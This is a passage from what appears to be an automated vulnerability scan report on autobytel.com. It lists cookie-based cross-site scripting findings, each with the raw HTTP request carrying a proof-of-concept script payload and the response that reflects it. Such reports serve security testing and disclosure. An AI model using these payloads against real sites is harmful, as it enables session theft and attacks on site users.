Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=645a6"%3balert(1)//14be9289b7; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:22 GMT
Content-Length: 22058
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "645a6";alert(1)//14be9289b7||";

           s.prop14 = "my garage page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engine Optimi
...[SNIP]...

4.2078. http://www.autobytel.com/new-car-price-quotes.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0580"%3balert(1)//60c900d953a was submitted in the BDATALIST cookie. This input was echoed as b0580";alert(1)//60c900d953a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b0580"%3balert(1)//60c900d953a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62687

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b0580";alert(1)//60c900d953a";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482804DA-FE90-75BA-D3C3E78F
...[SNIP]...

4.2079. http://www.autobytel.com/new-car-price-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-car-price-quotes.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61058"%3balert(1)//6df31272ede was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 61058";alert(1)//6df31272ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=61058"%3balert(1)//6df31272ede; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=61058;expires=Wed, 16-Jan-2041 23:53:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=61058%22%3Balert%281%29%2F%2F6df31272ede;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
           //s.prop7 = "buypr|";

           //s.prop9 = "buypr|Search Engine Optimization Project|13148";
           s.prop10 = "buypr|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "61058";alert(1)//6df31272ede||";

           s.prop14 = "buy|lm|newcar : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "buypr||||sky|ban|Search Eng
...[SNIP]...

4.2080. http://www.autobytel.com/new-cars.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19611"%3balert(1)//c01fa74b496 was submitted in the BDATALIST cookie. This input was echoed as 19611";alert(1)//c01fa74b496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c419611"%3balert(1)//c01fa74b496; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c419611";alert(1)//c01fa74b496";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "481CC3B8-D7A5-3C72-417DCA9A
...[SNIP]...

4.2081. http://www.autobytel.com/new-cars.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/new-cars.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a58"%3balert(1)//14303cfeb20 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as f1a58";alert(1)//14303cfeb20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=f1a58"%3balert(1)//14303cfeb20; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:50:14 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|rhp";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "f1a58";alert(1)//14303cfeb20||";

           s.prop14 = "new car home page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2082. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5233e"%3balert(1)//fc738b4235a was submitted in the BDATALIST cookie. This input was echoed as 5233e";alert(1)//fc738b4235a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45233e"%3balert(1)//fc738b4235a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:30 GMT
Content-Length: 22208
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45233e";alert(1)//fc738b4235a";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "486C2605-CE30-E673-3995D43B
...[SNIP]...

4.2083. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/repair-cost-calculator/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76c5"%3balert(1)//f9f2c543b9c was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as f76c5";alert(1)//f9f2c543b9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=f76c5"%3balert(1)//f9f2c543b9c; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:29 GMT
Content-Length: 22208
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "f76c5";alert(1)//f9f2c543b9c||";

           s.prop14 = "my garage page|repair-cost-calculator : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "|||
...[SNIP]...

4.2084. http://www.autobytel.com/sitemap/index.cfm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7225c"%3balert(1)//f5cfac0557e was submitted in the BDATALIST cookie. This input was echoed as 7225c";alert(1)//f5cfac0557e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c47225c"%3balert(1)//f5cfac0557e; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c47225c";alert(1)//f5cfac0557e";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48667D0C-FB46-9E31-A7323CA1
...[SNIP]...

4.2085. http://www.autobytel.com/sitemap/index.cfm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 809b4"%3balert(1)//25650409ef was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 809b4";alert(1)//25650409ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=809b4"%3balert(1)//25650409ef; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 51398

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

               s.prop8 = "|Honda_Accord";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "809b4";alert(1)//25650409ef||";

           s.prop14 = "unknown : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engine Optimization
...[SNIP]...

4.2086. http://www.autobytel.com/sitemap/index.cfm [PV_CT cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/sitemap/index.cfm

Issue detail

The value of the PV_CT cookie is copied into the HTML document as plain text between tags. The payload 96fe1<img%20src%3da%20onerror%3dalert(1)>47a1939aac3 was submitted in the PV_CT cookie. This input was echoed as 96fe1<img src=a onerror=alert(1)>47a1939aac3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /sitemap/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=296fe1<img%20src%3da%20onerror%3dalert(1)>47a1939aac3; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 59086
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:52:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 296fe1<img src=a onerror=alert(1)>47a1939aac3 cannot be converted to a number.
</h1>
...[SNIP]...

4.2087. http://www.autobytel.com/used-cars.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

